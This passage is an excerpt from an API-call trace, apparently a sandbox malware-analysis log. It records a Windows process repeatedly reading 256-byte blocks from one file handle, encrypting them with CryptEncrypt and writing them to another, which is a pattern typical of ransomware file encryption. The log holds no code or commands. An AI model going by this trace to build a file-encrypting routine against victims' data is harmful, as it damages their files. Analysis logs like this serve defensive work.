pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.343] GetLastError () returned 0x0 [0155.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.343] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.343] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.343] GetLastError () returned 0x0 [0155.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.343] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.343] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.343] GetLastError () returned 0x0 [0155.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.343] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.344] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.344] GetLastError () returned 0x0 [0155.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.344] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.344] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.344] GetLastError () returned 0x0 [0155.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.344] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.344] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.344] GetLastError () returned 0x0 [0155.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.344] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.344] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.344] GetLastError () returned 0x0 [0155.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.344] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.344] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.344] GetLastError () returned 0x0 [0155.344] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.344] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.345] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.345] GetLastError () returned 0x0 [0155.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.345] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.345] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.345] GetLastError () returned 0x0 [0155.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.345] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.345] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.345] GetLastError () returned 0x0 [0155.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.345] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.345] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.345] GetLastError () returned 0x0 [0155.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.345] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.345] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.345] GetLastError () returned 0x0 [0155.345] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.345] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.346] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.346] GetLastError () returned 0x0 [0155.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.346] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.346] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.346] GetLastError () returned 0x0 [0155.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.346] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.346] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.346] GetLastError () returned 0x0 [0155.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.346] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.346] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.346] GetLastError () returned 0x0 [0155.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.346] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.346] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.346] GetLastError () returned 0x0 [0155.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.346] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.346] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.346] GetLastError () returned 0x0 [0155.346] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.347] GetLastError () returned 0x0 [0155.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.347] GetLastError () returned 0x0 [0155.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.347] GetLastError () returned 0x0 [0155.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.347] GetLastError () returned 0x0 [0155.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.347] GetLastError () returned 0x0 [0155.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.347] GetLastError () returned 0x0 [0155.347] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.347] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.347] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.348] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.348] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.348] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.348] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.348] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.348] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.348] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.348] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.348] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.348] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.348] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.348] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.348] GetLastError () returned 0x0 [0155.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.349] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.349] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, 